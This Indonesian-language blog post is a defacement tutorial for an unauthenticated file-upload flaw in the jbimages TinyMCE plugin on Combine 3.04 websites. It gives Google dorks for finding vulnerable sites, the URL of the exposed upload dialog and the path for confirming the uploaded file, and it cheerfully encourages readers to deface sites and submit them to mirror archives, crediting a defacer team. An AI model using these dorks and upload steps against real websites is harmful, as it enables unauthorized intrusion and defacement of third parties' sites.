Jbimages TinyMCE Combine 3.04 Vulnerability

Daftar Isi [Tutup]
    Hallo sobat pixel kali ini gue mau ngebagiin tutor exploit Jbimages TinyMCE Combine 3.04 Vulnerability, Yaa walaupun gue sendiri bukan defacer langsung aja step by stepnya:

    [+]Exploit Title: Jbimages TinyMCE Combine 3.04 Vulnerability
    [+]Author: ./Sn00py
    [+]Team: N45HT
    [+]Goolge Dork:
    "index of jbimages/ site:"
    "intext:Powered By combine.or.id site:"

    [+]Tested on: Windows 10 pro
    [+]Vendor: http://combine.or.id/
    =======================================
    [+]Proof Of Concept:
    Dorking in google (Disini saya sudah memiliki target yaa)

    [+]Exploit:
    http://127.0.0.1/assets/tiny_mce/plugins/jbimages/dialog-v4.htm
    (kalian kasih exploit diatas maka tampilan akan berubah dan ada tombol upload)

    Kalian upload file gambar kalian jika succes maka ada tulisan "Upload Complete"

    [+]You can see the upload
    http://127.0.0.1/assets/images/Your_image.jpg
    (Dan boom berhasil, Tinggal mirror deh hehe >.<)

    Gimana cukup mudah bukan?Oiya untuk dork kalian kembangin sendiri lagi yaa, Yakali maunya di manjain mulu hehe >.< Oke Mungkin cukup sekian, Dont forget to share see you byee~

    source: https://cxsecurity.com/issue/WLB-2018060079

    Greetz: Shinchan - ZEROONE-04 - ZakirDotID - RSFLT - N45HT - AllindonesiaDefacer

    0 Response to "Jbimages TinyMCE Combine 3.04 Vulnerability"

    Post a Comment